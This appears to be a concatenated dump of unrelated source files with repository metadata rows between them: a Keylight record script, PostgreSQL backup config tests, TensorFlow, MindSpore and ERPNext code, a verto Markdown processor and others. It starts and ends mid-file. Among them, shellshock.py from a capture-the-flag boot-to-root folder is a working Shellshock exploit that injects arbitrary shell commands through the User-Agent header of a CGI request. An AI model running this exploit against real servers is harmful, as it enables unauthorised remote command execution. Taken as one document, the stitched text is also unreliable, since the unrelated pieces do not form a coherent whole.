] | 1,297 |
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
import demistomock as demisto
from CommonServerPython import *
import json
"""
This script is used to simplify the process of creating or updating a record in Keylight (v2).
You can add fields in the record as script arguments and/or in the
code. The format for the `kl-create-record` and `kl-update-record` commands are created quickly.
Fill out the args below and add arguments accordingly.
`args` dict contains the record fields you want to create in the component through create/update records.
`lookup_fields` - specifies which fields are lookup fields and what components they are taken from.
Output - locate the json file to create/update your records in `Keylight.JSON`
"""
def main():
##############################################################
args = {
# 'field_name': 'field_value',
'Task ID': demisto.args().get('task_id'), # Example
'Audit Project': demisto.args().get('project') # Example
}
lookup_fields = {
# 'argName': 'componentName',
'Audit Project': 'Audit Projects' # Example
}
##############################################################
components = demisto.executeCommand("kl-get-component", {})[0].get('Contents', {})
final_json = []
for field_name in args.keys():
if field_name in lookup_fields.keys():
component_id = get_component_id_by_name(lookup_fields.get(field_name), components)
records = demisto.executeCommand("kl-get-records", {'component_id': component_id})[0].get('Contents', {})
lookup_field_id = get_lookup_id(args[field_name], records)
field = {
'fieldName': field_name,
'value': lookup_field_id,
'isLookup': True
}
final_json.append(field)
else:
field = {
'fieldName': field_name,
'value': args[field_name],
'isLookup': False
}
final_json.append(field)
return_outputs(json.dumps(final_json, indent=4), {'Keylight.JSON': json.dumps(final_json)}, final_json)
def get_lookup_id(lookup_value, records):
for record in records:
if record.get('DisplayName', '') == lookup_value:
return record.get('ID', -1)
raise ValueError(f"Could not find {lookup_value} in the specified component.")
def get_component_id_by_name(component_name, components):
for component in components:
if component.get('Name') == component_name:
return component.get("ID", -1)
raise ValueError("Could not find component.")
if __name__ == "__builtin__" or __name__ == "builtins":
main()
| 35.96 | 117 | 0.609566 |
d1945bdd004e5a11a34f0860b4869f3b06fdd324
| 4,911 |
py
|
Python
|
test/test_config.py
|
st3fan/sphinx-automation-experiment
|
c92c8400770c6c604e2451e4f1e71957fc4c5ef8
|
[
"Apache-2.0"
] | 731 |
2018-06-01T21:48:43.000Z
|
2022-03-29T08:21:42.000Z
|
test/test_config.py
|
st3fan/sphinx-automation-experiment
|
c92c8400770c6c604e2451e4f1e71957fc4c5ef8
|
[
"Apache-2.0"
] | 124 |
2018-06-19T05:59:50.000Z
|
2022-03-31T18:17:59.000Z
|
test/test_config.py
|
st3fan/sphinx-automation-experiment
|
c92c8400770c6c604e2451e4f1e71957fc4c5ef8
|
[
"Apache-2.0"
] | 64 |
2018-06-26T14:12:53.000Z
|
2022-03-20T07:33:33.000Z
|
from pathlib import Path
from unittest.mock import patch
import pytest
import pghoard.config
from pghoard.rohmu.errors import InvalidConfigurationError
from .base import PGHoardTestCase
def make_mock_find_pg_binary(out_command, out_version):
def mock_find_pg_binary(wanted_program, versions=None, pg_bin_directory=None, check_commands=True): # pylint: disable=unused-argument
return out_command, out_version
return mock_find_pg_binary
def make_mock_get_command_version(wanted_version_string):
def mock_get_command_version(command, can_fail=True): # pylint: disable=unused-argument
return wanted_version_string
return mock_get_command_version
class TestConfig(PGHoardTestCase):
# Do not use config_template as we want only the minimum to call
# fill_config_command_paths
def minimal_config_template(
self, pg_bin_directory=None, pg_data_directory_version=None, basebackup_path=None, receivexlog_path=None
):
site_config = {
"active": True,
}
if pg_bin_directory:
site_config["pg_bin_directory"] = pg_bin_directory
if pg_data_directory_version:
site_config["pg_data_directory_version"] = pg_data_directory_version
if basebackup_path:
site_config["pg_basebackup_path"] = basebackup_path
if receivexlog_path:
site_config["pg_receivexlog_path"] = receivexlog_path
return {"backup_sites": {self.test_site: site_config}}
def test_valid_bin_directory(self, tmpdir):
"""
Test a valid bin directory, containing the required programs.
"""
for utility in ["postgres", "pg_basebackup", "pg_receivewal"]:
dest_path = tmpdir / utility
# Convert it to a proper Path
Path(dest_path).touch()
with patch("pghoard.config.get_command_version", make_mock_get_command_version("13.2")):
assert self._check_all_needed_commands_found(str(tmpdir)) == "13.2"
config = self.minimal_config_template(str(tmpdir))
site_config = config["backup_sites"][self.test_site]
pghoard.config.fill_config_command_paths(config, self.test_site, True)
assert site_config["pg_receivexlog_path"] == tmpdir / "pg_receivewal"
assert site_config["pg_receivexlog_version"] == 130002
assert site_config["pg_basebackup_path"] == tmpdir / "pg_basebackup"
assert site_config["pg_basebackup_version"] == 130002
def test_specific_pg_version(self, tmpdir):
for utility in ["postgres", "pg_basebackup", "pg_receivewal"]:
dest_path = tmpdir / utility
# Convert it to a proper Path
Path(dest_path).touch()
with patch("pghoard.config.get_command_version", make_mock_get_command_version("13.2")):
assert self._check_all_needed_commands_found(str(tmpdir)) == "13.2"
with pytest.raises(InvalidConfigurationError):
config = self.minimal_config_template(str(tmpdir), pg_data_directory_version="10")
pghoard.config.fill_config_command_paths(config, self.test_site, True)
config = self.minimal_config_template(str(tmpdir), pg_data_directory_version="13")
pghoard.config.fill_config_command_paths(config, self.test_site, True)
def test_fallback_to_path(self, tmpdir, monkeypatch):
for utility in ["postgres", "pg_basebackup", "pg_receivewal"]:
dest_path = tmpdir / utility
# Convert it to a proper Path
Path(dest_path).touch()
monkeypatch.setenv("PATH", str(tmpdir))
# Add a dummy bin directory so that we don't fallback on versions
# found in "well known locations"
config = self.minimal_config_template("/dummy/bin/directory/")
site_config = config["backup_sites"][self.test_site]
with patch("pghoard.config.get_command_version", make_mock_get_command_version("13.2")):
pghoard.config.fill_config_command_paths(config, self.test_site, True)
assert site_config["pg_receivexlog_path"] == tmpdir / "pg_receivewal"
assert site_config["pg_receivexlog_version"] == 130002
assert site_config["pg_basebackup_path"] == tmpdir / "pg_basebackup"
assert site_config["pg_basebackup_version"] == 130002
def test_unsupported_pg_version(self, tmpdir):
for utility in ["postgres", "pg_basebackup", "pg_receivewal"]:
dest_path = tmpdir / utility
# Convert it to a proper Path
Path(dest_path).touch()
with patch("pghoard.config.get_command_version", make_mock_get_command_version("8.2")):
config = self.minimal_config_template(str(tmpdir))
with pytest.raises(InvalidConfigurationError):
pghoard.config.fill_config_command_paths(config, self.test_site, True)
| 46.330189 | 138 | 0.693545 |
ae8ed3919fe19c84d9de1a7379b5b2c101f5fd33
| 344 |
py
|
Python
|
Boot2Root/vulnhub/Sokar/scripts/shellshock.py
|
Kan1shka9/CTFs
|
33ab33e094ea8b52714d5dad020c25730e91c0b0
|
[
"MIT"
] | 21 |
2016-02-06T14:30:01.000Z
|
2020-09-11T05:39:17.000Z
|
Boot2Root/vulnhub/Sokar/scripts/shellshock.py
|
Kan1shka9/CTFs
|
33ab33e094ea8b52714d5dad020c25730e91c0b0
|
[
"MIT"
] | null | null | null |
Boot2Root/vulnhub/Sokar/scripts/shellshock.py
|
Kan1shka9/CTFs
|
33ab33e094ea8b52714d5dad020c25730e91c0b0
|
[
"MIT"
] | 7 |
2017-02-02T16:27:02.000Z
|
2021-04-30T17:14:53.000Z
|
import requests
while True:
cmd = input("> ")
headers = {
'User-Agent' : '() { :; }; echo "Content-Type: text/html"; echo; export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; %s' % (cmd)
}
print((requests.get('http://192.168.1.31:591/cgi-bin/cat', headers = headers, timeout=5).text).strip())
| 38.222222 | 162 | 0.590116 |
4e8e19eba29b8bcd86296d684bc6d97791e0ab70
| 1,081 |
py
|
Python
|
src/onegov/feriennet/collections/activity.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/feriennet/collections/activity.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/feriennet/collections/activity.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
from onegov.activity import ActivityCollection
from onegov.feriennet.policy import ActivityQueryPolicy
from sqlalchemy.orm import joinedload
class VacationActivityCollection(ActivityCollection):
# type is ignored, but present to keep the same signature as the superclass
def __init__(self, session, type=None, pages=(0, 0), filter=None,
identity=None):
super().__init__(
session=session,
type='vacation',
pages=pages,
filter=filter
)
self.identity = identity
@property
def policy(self):
return ActivityQueryPolicy.for_identity(self.identity)
def transform_batch_query(self, query):
return query.options(joinedload('occasions'))
def query_base(self):
return self.policy.granted_subset(self.session.query(self.model_class))
def by_page_range(self, page_range):
return self.__class__(
session=self.session,
identity=self.identity,
pages=page_range,
filter=self.filter
)
| 28.447368 | 79 | 0.656799 |
0936b2231bbadedf6c7391b32fd6a5ba9146c24d
| 488 |
py
|
Python
|
frappe-bench/apps/erpnext/erpnext/patches/v8_1/removed_report_support_hours.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | 1 |
2021-04-29T14:55:29.000Z
|
2021-04-29T14:55:29.000Z
|
frappe-bench/apps/erpnext/erpnext/patches/v8_1/removed_report_support_hours.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
frappe-bench/apps/erpnext/erpnext/patches/v8_1/removed_report_support_hours.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | 1 |
2021-04-29T14:39:01.000Z
|
2021-04-29T14:39:01.000Z
|
# Copyright (c) 2017, Frappe and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
def execute():
frappe.db.sql(""" update `tabAuto Email Report` set report = %s
where name = %s""", ('Support Hour Distribution', 'Support Hours'))
frappe.db.sql(""" update `tabCustom Role` set report = %s
where report = %s""", ('Support Hour Distribution', 'Support Hours'))
frappe.delete_doc('Report', 'Support Hours')
| 34.857143 | 71 | 0.715164 |
eef2f951dda965fa12bea2cadfafa10d8cb185a8
| 409 |
py
|
Python
|
packages/watchmen-model/src/watchmen_model/admin/user_group.py
|
Indexical-Metrics-Measure-Advisory/watchmen
|
c54ec54d9f91034a38e51fd339ba66453d2c7a6d
|
[
"MIT"
] | null | null | null |
packages/watchmen-model/src/watchmen_model/admin/user_group.py
|
Indexical-Metrics-Measure-Advisory/watchmen
|
c54ec54d9f91034a38e51fd339ba66453d2c7a6d
|
[
"MIT"
] | null | null | null |
packages/watchmen-model/src/watchmen_model/admin/user_group.py
|
Indexical-Metrics-Measure-Advisory/watchmen
|
c54ec54d9f91034a38e51fd339ba66453d2c7a6d
|
[
"MIT"
] | null | null | null |
from typing import List
from pydantic import BaseModel
from watchmen_model.common import IndicatorId, OptimisticLock, SpaceId, TenantBasedTuple, UserGroupId, UserId
class UserGroup(TenantBasedTuple, OptimisticLock, BaseModel):
userGroupId: UserGroupId = None
name: str = None
description: str = None
userIds: List[UserId] = None
spaceIds: List[SpaceId] = None
indicatorIds: List[IndicatorId] = None
| 27.266667 | 109 | 0.794621 |
a303b6f2b7875ec8a36af087bf43217cb4442cb5
| 2,651 |
py
|
Python
|
src/visuanalytics/analytics/precondition/precondition.py
|
visuanalytics/visuanalytics
|
f9cce7bc9e3227568939648ddd1dd6df02eac752
|
[
"MIT"
] | 3 |
2020-08-24T19:02:09.000Z
|
2021-05-27T20:22:41.000Z
|
src/visuanalytics/analytics/precondition/precondition.py
|
SWTP-SS20-Kammer-2/Data-Analytics
|
23f71b49efed53bba2887d68e389c732566e1932
|
[
"MIT"
] | 342 |
2020-08-13T10:24:23.000Z
|
2021-08-12T14:01:52.000Z
|
src/visuanalytics/analytics/precondition/precondition.py
|
visuanalytics/visuanalytics
|
f9cce7bc9e3227568939648ddd1dd6df02eac752
|
[
"MIT"
] | 8 |
2020-09-01T07:11:18.000Z
|
2021-04-09T09:02:11.000Z
|
import logging
import time
from datetime import date
from visuanalytics.analytics.apis.api import fetch
from visuanalytics.analytics.util.type_utils import get_type_func, register_type_func
from visuanalytics.analytics.control.procedures.step_data import StepData
from visuanalytics.analytics.util.step_errors import PreconditionError, raise_step_error, PreconditionNotFulfilledError
Precondition_TYPES = {}
logger = logging.getLogger(__name__)
@raise_step_error(PreconditionError)
def register_precondition(func):
"""Registriert die übergebene Funktion und versieht sie mit einem `"try/except"`-Block.
Fügt eine Typ-Funktion dem Dictionary Precondition_TYPES hinzu.
:param func: die zu registrierende Funktion
:return: Funktion mit try/except-Block
"""
return register_type_func(Precondition_TYPES, PreconditionError, func)
@raise_step_error(PreconditionError)
def precondition(values: dict, step_data: StepData):
if values.get("precondition", None):
if step_data.get_config("testing", False) is False:
api_func = get_type_func(values["precondition"], Precondition_TYPES)
api_func(values, step_data)
@register_precondition
def date_today(values: dict, step_data: StepData):
"""
Stellt eine API Anfrage und prüft dannach ob der vorliegende Key dem heutigem Datum entspricht,
sollte das Datum mit dem heutigem übereinstimmen so läuft das programm weiter,
wenn nicht dann wird der Thread für die angegebene Zeit schlafen gelegt bis es erneut geprüft wird.
Nach einer Anzahl an Versuchen welche alle erfolglos waren wird der Thread mit einem PreconditionNotFulfilledError Error abgebrochen
:param values: Werte aus der JSON-Datei
:param step_data: Daten aus der API
:raise PreconditionNotFulfilledError: Wirft eine Exception wenn die Vorbedingung nach mehreren durchläufen immernoch nicht erfolgreich war
"""
condition = True
today = date.today()
counter = 0
sleep_time = values["precondition"]["sleep_time"]
while condition:
fetch(values["precondition"]["request"], step_data, "_pre")
compare = step_data.get_data(values["precondition"]["key"])
compare2 = today.strftime("%d.%m.%Y")
if compare[:values["precondition"]["key_split"]] == compare2:
condition = False
else:
counter += 1
logger.info(f"Precondition is not fulfills, waiting {sleep_time} seconds before trying again")
time.sleep(values["precondition"]["sleep_time"])
if counter >= values["precondition"]["exit"]:
raise PreconditionNotFulfilledError(counter)
| 42.079365 | 142 | 0.741607 |
e91a3c5b14462d60ddbba2ceaac02201631ba6da
| 2,159 |
py
|
Python
|
research/cv/MaskedFaceRecognition/utils/distance.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 77 |
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
research/cv/MaskedFaceRecognition/utils/distance.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 3 |
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
research/cv/MaskedFaceRecognition/utils/distance.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 24 |
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Numpy version of euclidean distance, etc."""
import numpy as np
from utils.metric import cmc, mean_ap
def normalize(nparray, order=2, axis=0):
"""Normalize a N-D numpy array along the specified axis."""
norm = np.linalg.norm(nparray, ord=order, axis=axis, keepdims=True)
return nparray / (norm + np.finfo(np.float32).eps)
def compute_dist(array1, array2, dis_type='euclidean'):
"""Compute the euclidean or cosine distance of all pairs.
Args:
array1: numpy array with shape [m1, n]
array2: numpy array with shape [m2, n]
type:
one of ['cosine', 'euclidean']
Returns:
numpy array with shape [m1, m2]
"""
assert dis_type in ['cosine', 'euclidean']
if dis_type == 'cosine':
array1 = normalize(array1, axis=1)
array2 = normalize(array2, axis=1)
dist = np.matmul(array1, array2.T)
return -1*dist
# shape [m1, 1]
square1 = np.sum(np.square(array1), axis=1)[..., np.newaxis]
# shape [1, m2]
square2 = np.sum(np.square(array2), axis=1)[np.newaxis, ...]
squared_dist = - 2 * np.matmul(array1, array2.T) + square1 + square2
squared_dist[squared_dist < 0] = 0
dist = np.sqrt(squared_dist)
return dist
def compute_score(dist_mat, query_ids, gallery_ids):
mAP = mean_ap(distmat=dist_mat, query_ids=query_ids, gallery_ids=gallery_ids)
cmc_scores, _ = cmc(distmat=dist_mat, query_ids=query_ids, gallery_ids=gallery_ids, topk=10)
return mAP, cmc_scores
| 37.877193 | 96 | 0.66466 |
6e89acd1d140fefb3b14e8ee71ab03a7cbf1676e
| 12,431 |
py
|
Python
|
benchmark/playground.py
|
zentonllo/tfg-tensorflow
|
095469a906de26984b4d781699e76bec02b1ef75
|
[
"MIT"
] | null | null | null |
benchmark/playground.py
|
zentonllo/tfg-tensorflow
|
095469a906de26984b4d781699e76bec02b1ef75
|
[
"MIT"
] | null | null | null |
benchmark/playground.py
|
zentonllo/tfg-tensorflow
|
095469a906de26984b4d781699e76bec02b1ef75
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Fri May 26 11:03:21 2017
@author: Alberto Terceño
Module that uses deep neural networks to save logs and detailed results of the training process
The code was built up from scratch
"""
import tensorflow as tf
import argparse
from dataset import Dataset
from dnn_multiclass import *
# Uncomment the next line and comment the previous one if you want to use dnn with just one output neuron
#from dnn_binary import *
import sys
import os
from os.path import abspath
from leaky_relu import leaky_relu
from datetime import datetime
# Disable info warnings from TF
os.environ['TF_CPP_MIN_LOG_LEVEL']='2'
# Parser FLAGS
FLAGS = None
# Change DEFAULT_ROOT_LOGDIR for the default log-dir
NOW = datetime.now().strftime("%Y-%m-%d--%Hh%Mm%Ss")
DEFAULT_ROOT_LOGDIR = '/tmp'
DEFAULT_LOG_DIR = "{}/playground-run-{}".format(DEFAULT_ROOT_LOGDIR, NOW)
# Default value for Momentum optimizer
MOMENTUM_PARAM = 0.9
# Default values for the FTRL optimizer
L1_PARAM = 0.0
L2_PARAM = 0.0
def print_hidden_layers(hidden_layers):
"""Helper function to print the number of neurons in the hidden layers"""
if hidden_layers is None:
print("Hidden Layers: None (Logistic regression is performed)")
else:
i = 1
for hl in hidden_layers:
print("Hidden Layer", i, ":", hl, "neurons")
i += 1
def print_parameters(n_inputs, n_outputs, normalizer_params):
"""Helper function to print model hyperparameters."""
print("Model hyperparameters (Binary classification problem)", "\n")
print("Input variables:", n_inputs)
print_hidden_layers(FLAGS.hidden_layers)
print("Output variables:", n_outputs, "\n")
print("Learning Rate:", FLAGS.learning_rate)
print("Activation Function:", FLAGS.activation_function)
print("Dropout Keep Probability:", FLAGS.dropout)
print("Batch size:", FLAGS.batch_size)
print("Regularization:", FLAGS.regularization)
print("Regularization parameter (beta):", FLAGS.reg_param)
batch_normalization = FLAGS.batch_norm
if batch_normalization:
bn = 'Yes'
else:
bn = 'No'
print("Batch normalization:", bn)
if batch_normalization:
print("Batch normalization parameters:", normalizer_params)
print("Optimizer:", FLAGS.optimizer, "\n")
def parse_act_function():
"""Function which parses the activation function."""
fun = FLAGS.activation_function
tf_fun = None
if fun is 'elu':
tf_fun = tf.nn.elu
elif fun is 'leaky_relu':
tf_fun = leaky_relu
elif fun is 'relu':
tf_fun = tf.nn.relu
elif fun is 'sigmoid':
tf_fun = tf.nn.sigmoid
elif fun is 'tanh':
tf_fun = tf.nn.tanh
elif fun is 'identity':
tf_fun = tf.nn.identity
return tf_fun
def parse_optimizer():
"""Function which parses the optimization for gradient descent."""
opt = FLAGS.optimizer
learning_rate = FLAGS.learning_rate
tf_opt = None
if opt is 'adam':
tf_opt = tf.train.AdamOptimizer(learning_rate=learning_rate, name='optimizer')
elif opt is 'adagrad':
tf_opt = tf.train.AdagradOptimizer(learning_rate=learning_rate, name='optimizer')
elif opt is 'adadelta':
tf_opt = tf.train.AdadeltaOptimizer(learning_rate=learning_rate, name='optimizer')
elif opt is 'ftrl':
tf_opt = tf.train.FtrlOptimizer(learning_rate=learning_rate,l1_regularization_strength=L1_PARAM, l2_regularization_strength=L2_PARAM, name='optimizer')
elif opt is 'rms_prop':
tf_opt = tf.train.RMSPropOptimizer(learning_rate=learning_rate, name='optimizer')
elif opt is 'momentum':
tf_opt = tf.train.MomentumOptimizer(learning_rate=learning_rate, momentum=MOMENTUM_PARAM, name='optimizer')
elif opt is 'grad_descent':
tf_opt = tf.train.GradientDescentOptimizer(learning_rate=learning_rate, name='optimizer')
return tf_opt
def parse_regularizer():
"""Function that parses the regularization methods."""
reg = FLAGS.regularization
beta = FLAGS.reg_param
tf_reg = None
if reg is None:
return None
if reg is 'L1':
tf_reg = tf.contrib.layers.l1_regularizer(scale=beta, scope=None)
elif reg is 'L2':
tf_reg = tf.contrib.layers.l2_regularizer(scale=beta, scope=None)
return tf_reg
def parse_normalizer():
"""Function which parses parameters for batch normalization.
If batch normalization is used in the first layer then the input data is normalized
Batch normalization can be used with higher learning rates
"""
if FLAGS.batch_norm:
normalizer_fn=tf.contrib.layers.batch_norm
else:
return None, None
scale_term = None
if FLAGS.activation_function is 'relu':
scale_term = False
else:
scale_term = True
normalizer_params = {
'is_training': None,
# 0.9, 0.99, 0.999 or 0.9999 ...
# According to TF performance guide: lower it if training is ok and validation/test is performing worse
# A.Geron suggest to try higher values for large datasets and small batch sizes
'decay': 0.9,
'updates_collections': None,
# If we don't use activation functions --> scale:true
'scale': scale_term,
# The 'fused parameter' allows better performance according to the TF performance guide
'fused': True
# Try zero_debias_moving_mean=True for improved stability
# 'zero_debias_moving_mean':True
}
return normalizer_fn, normalizer_params
def main(_):
log_dir = FLAGS.log_dir
log_dir = abspath(log_dir)
if tf.gfile.Exists(log_dir):
tf.gfile.DeleteRecursively(log_dir)
tf.gfile.MakeDirs(log_dir)
# Default paths for checkpoints and files generated
M_FOLDER = abspath(log_dir + '/model')
TR_FOLDER = abspath(log_dir + '/training')
M_PATH = abspath(M_FOLDER + '/DNN.ckpt')
TR_PATH = abspath(TR_FOLDER + '/DNN_tr.ckpt')
ROC_PATH = abspath(log_dir + '/roc.png')
CM_PATH = abspath(log_dir + '/cm.png')
CM_PATH_NORM = abspath(log_dir + '/cm_norm.png')
os.makedirs(M_FOLDER, exist_ok=True)
os.makedirs(TR_FOLDER, exist_ok=True)
# Equivalent to:
# tf.gfile.MakeDirs(M_FOLDER)
# tf.gfile.MakeDirs(TR_FOLDER)
OUTPUT_FILE = os.path.abspath(log_dir+"/log.txt")
# Redirect standard output to the log file
sys.stdout = open(OUTPUT_FILE, "w")
# El path va sin la extensión. El módulo Dataset se encarga de adjuntar la extensión
# Recall that the file path doesn't have the extension. The Dataset class handles this.
dataset_path = FLAGS.dataset_file
# Data ingestion stage
print("--------------------- (1) Starting to load dataset ---------------------","\n")
dataset = Dataset(path = dataset_path, train_percentage = 0.8, test_percentage = 0.1 )
x_test = dataset.x_test
y_test = dataset.y_test
print("Number of samples: ", dataset._num_examples)
print("Number of features: ", dataset._num_features)
print("--------------------- Dataset", dataset_path, "succesfully loaded ---------------------","\n")
# We start to parse the hyperparameters
n_inputs = dataset._num_features
n_outputs = dataset._num_classes
# Parsing hidden layers
intermediate_layers = []
if FLAGS.hidden_layers is not None:
intermediate_layers = FLAGS.hidden_layers
hidden_list = [n_inputs] + intermediate_layers + [n_outputs]
# Parsing activation functions
activation_function = parse_act_function()
# (1 - keep_prob) is the dropout rate
keep_prob = FLAGS.dropout
nb_epochs = FLAGS.epochs
batch_size = FLAGS.batch_size
regularizer = parse_regularizer()
normalizer_fn, normalizer_params = parse_normalizer()
optimizer = parse_optimizer()
# Print parameters used in the model
print_parameters(n_inputs, n_outputs, normalizer_params)
print("--------------------- (2) Starting to create the computational graph ---------------------","\n")
dnn = DNN(log_dir = log_dir,
hidden_list=hidden_list,
activation_function = activation_function,
keep_prob = keep_prob,
regularizer = regularizer,
normalizer_fn = normalizer_fn,
normalizer_params = normalizer_params,
optimizer = optimizer)
print("--------------------- Graph created ---------------------","\n")
print("--------------------- (3) Starting training ---------------------","\n")
dnn.train(dataset=dataset,model_path=M_PATH, train_path=TR_PATH, nb_epochs=nb_epochs, batch_size=batch_size, silent_mode=False)
print("--------------------- Training Finished ---------------------","\n")
print("--------------------- (4) Starting test ---------------------","\n")
dnn.test(x_test=x_test, y_test=y_test, model_path=M_PATH)
print("--------------------- Test Finished ---------------------","\n")
print("--------------------- (5) Saving model ROC curve ---------------------","\n")
dnn.save_roc(x_test, y_test, model_path=M_PATH, roc_path=ROC_PATH)
print("--------------------- ROC curve saved ---------------------","\n")
print("--------------------- (5) Saving confusion matrix ---------------------","\n")
dnn.save_cm(x_test, y_test, model_path=M_PATH, cm_path=CM_PATH_NORM, classes=['Normal transaction','Fraudulent transaction'],normalize=True)
dnn.save_cm(x_test, y_test, model_path=M_PATH, cm_path=CM_PATH, classes=['Normal transaction','Fraudulent transaction'], normalize=False)
print("--------------------- Confusion matrix saved ---------------------","\n")
sys.stdout = sys.__stdout__
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--dataset_file',
required=True,
type=str,
help='Path for the dataset. Do not include the .csv or .npy extension! All the csv columns must be numeric. Label column in the csv is the last one.')
parser.add_argument('--hidden_layers',
type=int,
default=None,
nargs='*',
help='Number of neurons in the hidden layers. Use None if logistic regression wants to be performed.')
parser.add_argument('--epochs', type=int, default=200,
help='Number of epochs to train the model.')
parser.add_argument('--batch_size', type=int, default=500,
help='Batch size used during training.')
parser.add_argument('--learning_rate', type=float, default=0.001,
help='Initial learning rate.')
parser.add_argument('--dropout', type=float, default=None,
help='Keep probability for training dropout, ie 1-dropout_rate. Use None to avoid using dropout')
parser.add_argument('--activation_function', type=str, default='elu',
help='Activation function to use in the hidden layers: elu, relu, leaky_relu, sigmoid, tanh, identity.')
parser.add_argument('--optimizer', type=str, default='adam',
help='Optimization method to use during training: adam, adagrad, rms_prop, ftrl, adadelta, momentum, grad_descent.')
parser.add_argument('--batch_norm', dest='batch_norm', action='store_true', default=True,
help='Indicate whether to use batch normalization.')
parser.add_argument('--no_batch_norm', dest='batch_norm', action='store_false', default=False,
help='Indicate whether to avoid batch normalization.')
parser.add_argument('--regularization', type=str, default=None,
help='Indicate whether to use L1 or L2 regularization. Use None to avoid regularization')
parser.add_argument('--reg_param', type=float, default=None,
help='Beta parameter for the regularization.')
parser.add_argument('--log_dir', type=str, default=DEFAULT_LOG_DIR,
help='Log directory to store images and TensorBoard summaries')
FLAGS, unparsed = parser.parse_known_args()
tf.app.run(main=main, argv=[sys.argv[0]] + unparsed)
| 36.136628 | 172 | 0.63776 |
42ce26a32e19cd517c59d4e86c92f15c7b2064ac
| 185 |
py
|
Python
|
apps/projects/apps.py
|
IT-PM-OpenAdaptronik/Webapp
|
c3bdde0ca56b6d77f49bc830fa2b8bb41a26bae4
|
[
"MIT"
] | 2 |
2017-12-17T21:28:22.000Z
|
2018-02-02T14:44:58.000Z
|
apps/projects/apps.py
|
IT-PM-OpenAdaptronik/Webapp
|
c3bdde0ca56b6d77f49bc830fa2b8bb41a26bae4
|
[
"MIT"
] | 118 |
2017-10-31T13:45:09.000Z
|
2018-02-24T20:51:42.000Z
|
apps/projects/apps.py
|
OpenAdaptronik/Rattler
|
c3bdde0ca56b6d77f49bc830fa2b8bb41a26bae4
|
[
"MIT"
] | null | null | null |
from django.apps import AppConfig
from django.utils.translation import gettext_lazy as _
class ProjectsConfig(AppConfig):
name = 'apps.projects'
verbose_name = _('projects')
| 20.555556 | 54 | 0.762162 |
6e1113e0459faecb4d28f706ab4f824c23f88144
| 3,262 |
py
|
Python
|
verto/processors/GenericTagBlockProcessor.py
|
uccser/verto
|
d36aa88b208f1700fafc033679bd1e9775496d25
|
[
"MIT"
] | 4 |
2017-04-10T06:09:54.000Z
|
2019-05-04T02:07:40.000Z
|
verto/processors/GenericTagBlockProcessor.py
|
uccser/verto
|
d36aa88b208f1700fafc033679bd1e9775496d25
|
[
"MIT"
] | 268 |
2017-04-03T20:40:46.000Z
|
2022-02-04T20:10:08.000Z
|
verto/processors/GenericTagBlockProcessor.py
|
uccser/kordac
|
d36aa88b208f1700fafc033679bd1e9775496d25
|
[
"MIT"
] | 1 |
2019-01-07T15:46:31.000Z
|
2019-01-07T15:46:31.000Z
|
from markdown.blockprocessors import BlockProcessor
from verto.processors.utils import parse_arguments, process_parameters
from verto.utils.HtmlParser import HtmlParser
import re
class GenericTagBlockProcessor(BlockProcessor):
''' A generic processor that matches '{<name> args}' and replaces
with the according html template.
'''
def __init__(self, processor, ext, *args, **kwargs):
'''
Args:
ext: An instance of the Verto Extension.
'''
super().__init__(*args, **kwargs)
self.processor = processor
self.settings = ext.settings
tag_argument = ext.processor_info[self.processor].get('tag_argument', self.processor)
self.pattern = re.compile(r'(^|\n) *\{{{0} ?(?P<args>[^\}}]*)(?<! end)\}} *(\n|$)'.format(tag_argument))
self.arguments = ext.processor_info[self.processor]['arguments']
template_name = ext.processor_info[self.processor].get('template_name', tag_argument)
self.template = ext.jinja_templates[template_name]
self.template_parameters = ext.processor_info[self.processor].get('template_parameters', None)
self.process_parameters = lambda processor, parameters, argument_values: \
process_parameters(ext, processor, parameters, argument_values)
def test(self, parent, block):
''' Tests a block to see if the run method should be applied.
Args:
parent: The parent node of the element tree that children
will reside in.
block: The block to be tested.
Returns:
True if there is a match within the block.
'''
return self.pattern.search(block) is not None
def run(self, parent, blocks):
''' Generic run method for single match tags.
Args:
parent: The parent node of the element tree that children
will reside in.
blocks: A list of strings of the document, where the
first block tests true.
'''
block = blocks.pop(0)
match = self.pattern.search(block)
before = block[:match.start()]
after = block[match.end():]
if before.strip() != '':
self.parser.parseChunk(parent, before)
if after.strip() != '':
blocks.insert(0, after)
argument_values = parse_arguments(self.processor, match.group('args'), self.arguments)
extra_args = self.custom_parsing(argument_values)
argument_values.update(extra_args)
